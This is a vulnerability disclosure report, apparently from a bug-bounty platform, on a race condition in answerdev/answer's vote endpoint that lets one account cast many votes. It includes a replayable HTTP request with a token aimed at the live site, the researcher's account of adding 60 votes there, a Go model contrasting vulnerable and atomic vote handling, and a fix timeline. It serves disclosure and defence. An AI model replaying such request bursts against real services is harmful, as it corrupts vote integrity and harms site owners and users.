Race Condition Vulnerability Can Lead to Up Vote Stealing in answerdev/answer

Valid

Reported on

Feb 20th 2023


Description

I tested this on the live production site https://meta.answer.dev/. answerdev/answer provides up vote and down vote functions on posts. The vote endpoint does not handle concurrent requests atomically: if the same vote request is sent many times in parallel, more than one copy passes the "already voted" check and is counted, so an attacker can increase or decrease a post's vote total by far more than the single vote one account should be able to cast.

Proof of Concept

1). Go to a question and press up vote or down vote.
2). This PoC uses up vote.
3). Intercept the HTTP request and send it to Turbo Intruder.
4). Configure and run.
5). Bingo!

POST /answer/api/v1/vote/up HTTP/2
Host: meta.answer.dev
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 4eb174c8-b0f3-11ed-83ed-0242ac190003
Content-Type: application/json
Content-Length: 51
Origin: https://meta.answer.dev
Referer: https://meta.answer.dev/questions/10010000000000001/welcome-to-answer-community
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"object_id":"10070000000000003","is_cancel":false}

Go to this link and search for the user "sunny". I added 60 votes to his comment. https://meta.answer.dev/questions/10010000000000001/welcome-to-answer-community
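The race the PoC exploits, modelled in Go (the language answer is written in) as an added example; this is not the project's own code and does not reflect how its vote handler is actually written. The VoteStore, the hold() hook that stands in for the latency between the "has this user voted?" check and the write, and the user id "attacker" are assumptions made for the demonstration; the object_id is the one from the request body above. The harness parks every request at its hold() point until all of them are there, which turns the nondeterministic race into the worst-case interleaving a Turbo Intruder burst can produce, so the result is reproducible.

```go
package main

import (
	"fmt"
	"sync"
	"sync/atomic"
)

// VoteStore stands in for the tables behind the vote endpoint (an assumed model).
type VoteStore struct {
	mu     sync.Mutex
	voters map[string]map[string]bool // objectID -> userID -> has voted
	counts map[string]int             // objectID -> vote count
}

func NewVoteStore() *VoteStore {
	return &VoteStore{voters: map[string]map[string]bool{}, counts: map[string]int{}}
}

// hasVoted is the "SELECT" half: locked on its own, so another request can run
// between it and record().
func (s *VoteStore) hasVoted(obj, user string) bool {
	s.mu.Lock()
	defer s.mu.Unlock()
	return s.voters[obj][user]
}

// record is the "INSERT vote, UPDATE count" half. The caller must hold s.mu.
func (s *VoteStore) record(obj, user string) {
	if s.voters[obj] == nil {
		s.voters[obj] = map[string]bool{}
	}
	s.voters[obj][user] = true
	s.counts[obj]++
}

// VulnerableUpvote is check-then-act with a gap between check and write. hold()
// marks the gap; in production it is the SELECT-to-INSERT latency a burst lands in.
func (s *VoteStore) VulnerableUpvote(obj, user string, hold func()) bool {
	if s.hasVoted(obj, user) {
		return false
	}
	hold()
	s.mu.Lock()
	s.record(obj, user)
	s.mu.Unlock()
	return true
}

// SafeUpvote checks and writes in one critical section. The database analogue is
// a UNIQUE (object_id, user_id) constraint, or SELECT ... FOR UPDATE plus the
// INSERT in one transaction. hold() runs on entry only: same burst, no gap.
func (s *VoteStore) SafeUpvote(obj, user string, hold func()) bool {
	hold()
	s.mu.Lock()
	defer s.mu.Unlock()
	if s.voters[obj][user] {
		return false
	}
	s.record(obj, user)
	return true
}

// RaceUpvote fires n concurrent attempts, parks each at its hold() point until
// all n are there, then releases them together. Returns how many were accepted.
func RaceUpvote(n int, upvote func(hold func()) bool) int {
	var arrived, finished sync.WaitGroup
	arrived.Add(n)
	finished.Add(n)
	release := make(chan struct{})
	var accepted int64
	for i := 0; i < n; i++ {
		go func() {
			defer finished.Done()
			if upvote(func() { arrived.Done(); <-release }) {
				atomic.AddInt64(&accepted, 1)
			}
		}()
	}
	arrived.Wait()
	close(release)
	finished.Wait()
	return int(accepted)
}

// Demo sends n identical up-votes from one account to each implementation and
// returns the resulting vote counts (vulnerable, safe).
func Demo(n int) (vulnCount, safeCount int) {
	const obj, user = "10070000000000003", "attacker" // object_id from the PoC; user is made up
	vuln, safe := NewVoteStore(), NewVoteStore()
	RaceUpvote(n, func(hold func()) bool { return vuln.VulnerableUpvote(obj, user, hold) })
	RaceUpvote(n, func(hold func()) bool { return safe.SafeUpvote(obj, user, hold) })
	return vuln.counts[obj], safe.counts[obj] // all goroutines have finished, so no lock needed
}

func main() {
	v, s := Demo(60)
	fmt.Printf("60 parallel up-votes from one account: vulnerable=%d safe=%d\n", v, s)
}
```

With 60 parallel requests the vulnerable store ends at 60 votes from a single account, matching the 60 votes the report describes, while the safe store ends at 1. The point to check in a real fix is the same as in SafeUpvote: the existence check and the insert must be one atomic unit (a unique index on the vote row, or both statements inside one transaction with the row locked), because any per-statement locking still leaves the window open.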

Impact

An attacker can add or remove an arbitrary number of votes on a post from a single account, so vote totals, and anything ranked or rewarded on the basis of them, can no longer be trusted.

References

Timeline

We are processing your report and will contact the answerdev/answer team within 24 hours. 10 months ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists 10 months ago
We have contacted a member of the answerdev/answer team and are waiting to hear back 9 months ago
Ko Ko Naing
9 months ago

Researcher


May I know if there is any update, please?

Ko Ko Naing
8 months ago

Researcher


This is a kind follow-up comment.

answerdev/answer maintainer validated this vulnerability 4 months ago
Ko Ko Naing has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
answerdev/answer maintainer marked this as fixed in v1.1.1 with commit 47661d 4 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
answerdev/answer maintainer published this vulnerability 4 months ago